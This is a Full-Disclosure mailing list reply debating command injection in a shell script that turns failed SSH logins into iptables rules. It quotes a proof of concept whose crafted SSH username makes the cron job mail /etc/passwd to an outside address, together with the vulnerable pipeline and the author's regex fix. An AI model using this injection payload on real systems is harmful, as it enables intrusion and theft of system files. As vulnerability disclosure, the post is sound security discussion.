Tavis Ormandy wrote:
However, it is certainly possible. Here is an example.
#!/bin/sh
command='$(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@lists.grok.org.uk)<${x}etc${x}passwd)'
ssh -o "BatchMode yes" "a a $command"@$1
Which produces log entries like this:
Nov 28 15:14:15 insomniac sshd[5897]: pam_succeed_if(sshd:auth): error retrieving information about user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@lists.grok.org.uk)<${x}etc${x}passwd)
Nov 28 15:14:15 insomniac sshd[5897]: Failed password for invalid user a a $(x=$(pwd|head${IFS}-c1);$(cat<<<mail${IFS}full-disclosure@lists.grok.org.uk)<${x}etc${x}passwd) from 127.0.0.1 port 47403 ssh2
Note that the 13th field both contains a dot and is entirely controlled
by me. This string is placed in /etc/hosts.deny by the script after
executed by cron.
The $1 in the awk script below is the entire string, which is piped
unsanitised into /bin/sh:
awk '!/#/ && /\./ && !a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT"}' /etc/hosts.deny |\
awk '/iptables/ && !/#/ && !/-s -i/'|sh
The results are obvious.
Incorrect did you look at the fix? It isn't unsanitized as you state:
Firstly data being passed is not coming through via /var/log/secure or
/var/log/auth* its coming in via /etc/hosts.deny
function IPT {
grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
/etc/hosts.deny|\
sed 's/::ffff://g'|\
awk '!/#/&&/\./&&!a[$0]++
{print "iptables -A INPUT -s "$1" -i eth0 -d 208.51.101.194 -p TCP
--dport 22 -j REJECT"}'|\
awk '/iptables/&&!/#/&&!/-s -i/'|sh
}
[root@voip2 ~]# cat testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
2383274298734
sakjdhasiuwe
hacker
aaa
bbb
ccc
0wn3d
[root@voip2 ~]# grep -E
'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[1-9])(\.(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])){3}'
testing.deny
89.96.238.226
219.146.59.225
211.97.194.148
220.110.34.44
So the buck stops there before it is put into the shell.
--
====================================================
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
